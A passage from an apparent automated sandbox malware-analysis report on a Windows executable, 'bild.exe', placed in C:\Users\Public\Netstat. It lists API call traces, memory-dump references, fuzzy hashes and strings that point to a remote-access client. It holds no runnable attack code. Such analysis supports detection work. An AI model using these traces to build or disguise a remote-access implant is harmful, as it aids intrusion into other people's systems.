• touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
• String ID: touchkbd, systype=%d, chassis=%d, took %d ms
• API String ID: 3804766296-4122679463
• Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
• Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
• Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
• Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
APIs
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
• K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
• SetLastError.KERNEL32(00000078,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FED
Strings
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: AddressEnumErrorLastModulesProcProcess
• String ID: EnumProcessModules
• API String ID: 3858832252-3735562946
• Opcode ID: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
• Instruction ID: 1f45313c9618d1b82b77f5c4991c8e3b0a8d42ff715d9f74dc5a394723b8855a
• Opcode Fuzzy Hash: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
• Instruction Fuzzy Hash: 0AF05E76604318AFCB10DF99D844E5B77A8EB48722F00C91AF959D7A40C770E810CFA4
APIs
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
• K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
• SetLastError.KERNEL32(00000078,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D503D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: AddressErrorFileLastModuleNameProc
• String ID: GetModuleFileNameExA
• API String ID: 4084229558-758377266
• Opcode ID: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
• Instruction ID: b668353775b84e478f8563f09fc45590e4c1a8c49a3114c32819ef85dfabe2bd
• Opcode Fuzzy Hash: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
• Instruction Fuzzy Hash: BCF05EB2A15318AFCB20CF98E844E5777B8EB48712F00491AF946D7A40C671F8108BE5
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
• CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseCreateHandleThread__wcstoi64
• String ID: *AutoICFConfig$Client
• API String ID: 3257255551-59951473
• Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
• Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
• Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
• Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
APIs
• Sleep.KERNEL32(000000FA), ref: 11070CB7
• EnterCriticalSection.KERNEL32(?), ref: 11070CC4
• LeaveCriticalSection.KERNEL32(?), ref: 11070D96
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeaveSleep
• String ID: Push
• API String ID: 1566154052-4278761818
• Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
• Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
• Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
• Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
APIs
• EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
• InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
• Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
• LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
• String ID:
• API String ID: 4212191310-0
• Opcode ID: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
• Instruction ID: 6ce86c6274da148b161707994638ed71208ef8689c4a0a7f58997b6c95419f75
• Opcode Fuzzy Hash: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
• Instruction Fuzzy Hash: 8C21A1B2A00300EFDF119B1ECC8269BB7B8ABC631AF160527D85693E51D771B9408B59
APIs
• GetCommandLineA.KERNEL32 ref: 004B1027
• GetStartupInfoA.KERNEL32(?), ref: 004B107B
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 004B1096
• ExitProcess.KERNEL32 ref: 004B10A3
Memory Dump Source
• Source File: 00000005.00000002.4161045215.00000000004B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000005.00000002.4160974107.00000000004B0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4b0000_bild.jbxd
Yara matches
Similarity
• API ID: CommandExitHandleInfoLineModuleProcessStartup
• String ID:
• API String ID: 2164999147-0
• Opcode ID: c8380fc8b7a9bb1e0314ce0ace8c6e8214bf07186bff5c90b1d3a785b2fc9413
• Instruction ID: 6060780b13e5b668971955b615befdb95331e0e062bfc026d6c7cd8391be33ed
• Opcode Fuzzy Hash: c8380fc8b7a9bb1e0314ce0ace8c6e8214bf07186bff5c90b1d3a785b2fc9413
• Instruction Fuzzy Hash: 5D11E5204083C85BEB317F7489A87EBBFA55F13384FA40056D9D696766C25A48C7C37D
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1314093303-0
                                                                                      • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                      • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                      APIs
                                                                                      • ioctlsocket.WSOCK32(939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D1F
                                                                                      • select.WSOCK32(00000001,?,00000000,?,00000000,939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ioctlsocketselect
                                                                                      • String ID: a3^l
                                                                                      • API String ID: 1457273030-3838789914
                                                                                      • Opcode ID: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                      • Instruction ID: 1ce468167fe70463d1bb97893f50ce00efcffce07f53c34d7d8f41d98ebfc4fe
                                                                                      • Opcode Fuzzy Hash: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                      • Instruction Fuzzy Hash: 4B213370A013188BEB28DF18CD547DDB7B9EF84304F4081DAA80957681D7705F95DF90
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess
                                                                                      • String ID: C:\Users\Public\Netstat\bild.exe
                                                                                      • API String ID: 2251294070-3316297413
                                                                                      • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                      • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • _memset.LIBCMT ref: 1110F4D2
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp
                                                                                      • API String ID: 2803934178-2363596943
                                                                                      • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                      • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: \\.\NSWFPDrv
                                                                                      • API String ID: 3498533004-85019792
                                                                                      • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                      • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1679841372-0
                                                                                      • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                      • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 6C5D8FE4
                                                                                      • getsockname.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D9005
                                                                                      • WSAGetLastError.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D902E
                                                                                        • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
